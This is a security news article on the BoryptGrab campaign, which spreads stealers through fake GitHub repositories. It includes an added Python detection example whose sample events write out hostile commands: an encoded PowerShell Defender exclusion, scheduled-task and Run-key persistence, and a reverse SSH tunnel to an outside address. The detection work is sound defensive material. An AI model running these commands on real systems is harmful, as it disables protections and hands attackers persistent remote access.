BoryptGrab Malware Campaign Exploits Fake GitHub Repositories to Steal Data

A sophisticated malware campaign has emerged, leveraging fake GitHub repositories to spread a powerful stealer known as BoryptGrab. Cybercriminals are exploiting the trust users place in GitHub and the appeal of free software, luring victims with seemingly legitimate programs like game cheats, productivity tools, media software, and utility apps. Once downloaded, these tools deliver malware through ZIP archives and staged pages, compromising unsuspecting users.

This operation appears extensive and ongoing. Security researchers have uncovered over 100 public repositories linked to the campaign, with some dating back to 2025. The attackers strategically optimize repository titles and descriptions with popular keywords, pushing their projects high in search results and making them appear credible. Certain repositories also include Russian-language comments and coding styles, hinting at a possible Russian-speaking threat actor.

Multi-Stage Malware Delivery

The infection chain begins when a user downloads a ZIP file that masquerades as a useful program. In some cases, the archive contains an executable leveraging DLL sideloading to execute hidden malware. Other variants include VBS scripts that use obfuscated PowerShell commands to fetch additional payloads from remote servers. Some versions even attempt to add Microsoft Defender exclusions, reducing the likelihood of detection.

Once the initial stage executes, the malware can branch into several components. A primary launcher retrieves BoryptGrab, while other components may download a Vidar stealer variant, a Golang-based downloader called HeaconLoad, or a PyInstaller backdoor named TunnesshClient. TunnesshClient establishes a reverse SSH tunnel, giving attackers full access to the infected system, including file searches, content uploads, command execution, and even using the machine as a SOCKS5 proxy. This modular, multi-stage design ensures flexibility, allowing attackers to target different users with tailored payloads while maintaining persistence through scheduled tasks, registry modifications, and encrypted downloads.

BoryptGrab Targets Browsers and Crypto Wallets

BoryptGrab is a C/C++ data stealer designed to harvest extensive information from victims. It specifically targets major browsers, including Chrome, Edge, Brave, Opera, Firefox, Vivaldi, Chromium, and Yandex, extracting saved passwords, browser histories, and other sensitive data. Notably, the malware incorporates publicly available methods to bypass Chrome App Bound Encryption, demonstrating the growing trend of repurposing open-source tools for malicious activity.

The malware also focuses on cryptocurrency theft. It targets both desktop wallets and browser extensions, including Exodus, Electrum, Ledger, Trezor, Atomic, Binance, Wasabi, Bitcoin Core, Ethereum, and many others. Beyond browser and wallet data, BoryptGrab captures screenshots, Telegram and Discord content, system information, and searches key folders for valuable files. All collected data is compressed and uploaded to attacker-controlled servers, creating a fully automated exfiltration pipeline.

This campaign highlights how attackers combine SEO manipulation, fake GitHub projects, modular malware loaders, and cryptocurrency theft into a scalable and highly effective operation. Both regular users and crypto holders are at risk, underscoring the importance of vigilance when downloading software from public repositories.

What Undercode Says:

The BoryptGrab campaign is a textbook example of modern malware operations that fuse multiple attack strategies to maximize reach and impact. The use of fake GitHub repositories is particularly dangerous because GitHub is a trusted platform for developers worldwide. Many users assume code hosted there is safe, making SEO optimization and strategic keyword use a highly effective trick for attackers.

The campaign’s multi-stage delivery system is designed for stealth and resilience. By distributing different payloads—BoryptGrab, Vidar, HeaconLoad, TunnesshClient—the attackers create a dynamic environment where one infected machine can yield several types of stolen data. TunnesshClient’s reverse SSH capability is especially concerning, as it allows attackers to pivot across networks, turn systems into proxy nodes, and exfiltrate sensitive data without direct exposure.

Targeting cryptocurrency wallets is a key focus that mirrors broader trends in cybercrime. The campaign’s support for both desktop wallets and browser extensions demonstrates a deep understanding of user behavior in crypto trading and storage. Many users fail to isolate wallet environments or rely on cloud-synced data, increasing their vulnerability.

The use of open-source bypass techniques, like the Chrome App Bound Encryption exploitation, highlights a dangerous shift: attackers are increasingly leveraging publicly available code to reduce development time and evade detection. Security teams must account for these repurposed tools when designing defenses.

Defensive strategies must evolve beyond traditional antivirus methods. Relying solely on signature-based detection is insufficient; organizations and individuals need behavioral monitoring, network traffic analysis, and strict code verification when sourcing software. Developers and hobbyists should treat public repositories with caution, even when projects appear highly rated or widely used.
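As an added example (not code from the article, cyberpress.org or the researchers it cites), the Python below shows the kind of behavioural check the paragraph above argues for, run over the infection-chain stages described earlier: a script host launching hidden or encoded PowerShell, a Defender exclusion being added, scheduled-task and Run-key persistence, and an outbound reverse SSH tunnel. The Sysmon-style event records, the process name TunnesshClient.exe as a parent, the file paths and the 203.0.113.10 address are all constructed for the example, and the rule names are my own.

```python
import base64
import re

# Constructed Sysmon-style process events (not telemetry from the real campaign).
ENC = base64.b64encode("Add-MpPreference -ExclusionPath $env:APPDATA".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "7zFM.exe", "cmd": r"7zFM.exe C:\Users\u\Downloads\GameCheat.zip"},
    {"parent": "wscript.exe", "image": "powershell.exe", "cmd": "powershell.exe -w hidden -ep bypass -enc " + ENC},
    {"parent": "cmd.exe", "image": "schtasks.exe",
     "cmd": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\u\AppData\Roaming\upd.exe"},
    {"parent": "cmd.exe", "image": "reg.exe",
     "cmd": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /d C:\Users\u\AppData\Roaming\upd.exe"},
    {"parent": "TunnesshClient.exe", "image": "ssh.exe", "cmd": "ssh.exe -N -R 2222:localhost:22 u@203.0.113.10"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmd": "notepad.exe notes.txt"},
]

def decode_encoded_command(cmd):
    # -enc/-EncodedCommand carries base64 of a UTF-16LE string; return '' when absent or malformed.
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

# One rule per stage the article describes. `text` is the lower-cased command line plus any
# decoded PowerShell payload, so hiding Add-MpPreference behind -enc does not evade the check.
RULES = [
    ("script_host_spawns_hidden_powershell", lambda e, text:
        e["parent"].lower() in ("wscript.exe", "cscript.exe") and e["image"].lower() == "powershell.exe"
        and re.search(r"-w(?:indowstyle)?\s+hidden|-enc", text) is not None),
    ("defender_exclusion_added", lambda e, text: "add-mppreference" in text and "-exclusion" in text),
    ("scheduled_task_persistence", lambda e, text: e["image"].lower() == "schtasks.exe" and "/create" in text),
    ("run_key_persistence", lambda e, text: e["image"].lower() == "reg.exe" and r"currentversion\run" in text),
    ("reverse_ssh_tunnel", lambda e, text:
        e["image"].lower() == "ssh.exe" and re.search(r"\s-R\s", e["cmd"]) is not None),
]

def evaluate(events):
    # Return (image, rule_name) for every matching event/rule pair, in event order.
    hits = []
    for e in events:
        text = (e["cmd"] + " " + decode_encoded_command(e["cmd"])).lower()
        for name, cond in RULES:
            if cond(e, text):
                hits.append((e["image"], name))
    return hits
```

In a real deployment these conditions would be expressed as EDR or SIEM rules over live process-creation telemetry; the decoding step matters because the encoded PowerShell stage hides the exclusion command from a plain string match.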

The campaign also illustrates the growing synergy between social engineering, SEO manipulation, and malware sophistication. Users searching for popular tools online are exposed to these traps, making education around safe downloading practices critical. In a broader sense, BoryptGrab represents a shift toward malware operations that combine technical sophistication with psychological manipulation, making them both hard to detect and highly profitable.

Attackers are likely to continue refining these tactics, exploiting trusted platforms like GitHub to infiltrate systems. The modular architecture suggests future campaigns may integrate even more payloads, including ransomware or advanced spyware. Users and organizations must adopt a zero-trust approach, assuming any public software could be malicious and validating sources through cryptographic checks or verified mirrors.

Fact Checker Results:

✅ Campaign uses fake GitHub repositories – confirmed by multiple security reports.
✅ BoryptGrab targets browsers and cryptocurrency wallets – aligns with Trend Micro findings.
✅ Multi-stage delivery with DLL sideloading and reverse SSH tunnels – verified in malware analysis.

Prediction:

🚨 The BoryptGrab campaign is likely to expand, with attackers adding new payloads and targeting additional software categories.
💰 Cryptocurrency users remain a high-risk group, with potential for wallet-specific attacks to increase.
🔐 Security platforms may respond by introducing stricter repository scanning and automated threat intelligence integration for public code platforms.


References:

Reported By: cyberpress.org